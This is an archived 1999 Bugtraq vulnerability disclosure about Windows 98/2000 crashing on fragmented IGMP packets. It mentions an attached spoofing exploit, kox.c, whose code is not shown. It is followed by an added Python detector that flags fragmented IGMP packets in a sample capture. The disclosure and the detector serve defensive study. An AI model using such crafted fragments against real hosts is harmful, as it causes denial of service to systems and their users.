The OpenNET Project / Index page
IGMP fragmentation bug in Windows 98/2000

Date: Sat, 3 Jul 1999 17:56:29 -0700
From: Coolio <coolio@K-R4D.COM>
To: BUGTRAQ@netspace.org
Subject: IGMP fragmentation bug in Windows 98/2000

Windows 98's TCP/IP stack chokes on fragmented IGMP packets. There is an
exploit out there called "fawx" that supposedly exploits this problem,
but I haven't had any success crashing Windows with it. Recently I was
given source to a program that reliably crashed Win98/98SE/2000 build 2000
and challenged my friend defile to see who could write a version of it
utilizing handcrafted igmp/ip headers for source spoofing support. Here is
the resulting code that works against most systems with one or two tries.

[attachment: kox.c]
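From the defender's side, the condition the post describes (an IGMP datagram arriving as IP fragments) is easy to spot in a capture. The following Python is an added example, not code from the post or from the attached kox.c: it parses raw IPv4 headers and flags any packet whose protocol is IGMP (2) and which carries the More Fragments flag or a non-zero fragment offset. The sample packets are constructed inline with a small header builder; the checksum field is left at zero because the parser does not verify it.

```python
import struct

IPPROTO_IGMP = 2

def parse_ipv4(pkt: bytes):
    """Parse the fixed IPv4 header; return None if too short or not IPv4."""
    if len(pkt) < 20:
        return None
    (ver_ihl, _tos, _tlen, ident, flags_frag,
     _ttl, proto, _csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or len(pkt) < ihl:
        return None
    return {"proto": proto, "ident": ident,
            "mf": bool(flags_frag & 0x2000),            # More Fragments flag
            "frag_offset": (flags_frag & 0x1FFF) * 8,   # offset is in 8-byte units
            "src": ".".join(str(b) for b in src),
            "dst": ".".join(str(b) for b in dst)}

def is_fragmented_igmp(pkt: bytes) -> bool:
    """True if the datagram is IGMP and is one fragment of a larger datagram."""
    hdr = parse_ipv4(pkt)
    if hdr is None or hdr["proto"] != IPPROTO_IGMP:
        return False
    return hdr["mf"] or hdr["frag_offset"] > 0

def flag_fragmented_igmp(packets):
    """Return (index, src, dst, ip_id) for every fragmented IGMP packet in a capture."""
    hits = []
    for i, pkt in enumerate(packets):
        if is_fragmented_igmp(pkt):
            h = parse_ipv4(pkt)
            hits.append((i, h["src"], h["dst"], h["ident"]))
    return hits

def _ipv4(proto, src, dst, payload, ident=1, mf=False, offset=0):
    """Build a minimal IPv4 header for the constructed samples below (checksum left 0)."""
    flags_frag = (0x2000 if mf else 0) | (offset // 8)
    addr = lambda a: bytes(int(x) for x in a.split("."))
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident, flags_frag,
                       64, proto, 0, addr(src), addr(dst)) + payload

# Constructed sample "capture": only entries 2 and 3 are IGMP fragments.
SAMPLE_PACKETS = [
    _ipv4(IPPROTO_IGMP, "10.0.0.5", "224.0.0.1", b"\x16\x00\x00\x00\xe0\x00\x00\x01"),  # whole IGMPv2 report
    _ipv4(17, "10.0.0.5", "10.0.0.9", b"\x00" * 16, ident=7, mf=True),                  # fragmented UDP, ignored
    _ipv4(IPPROTO_IGMP, "10.0.0.5", "10.0.0.9", b"\x00" * 16, ident=4242, mf=True),     # IGMP first fragment
    _ipv4(IPPROTO_IGMP, "10.0.0.5", "10.0.0.9", b"\x00" * 8, ident=4242, offset=16),   # IGMP last fragment
    b"\x45\x00",                                                                         # truncated, ignored
]
```

Grouping hits by (src, dst, ip_id) gives one alert per fragmented datagram rather than one per fragment.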

Created 1996-2003 by Maxim Chirkov  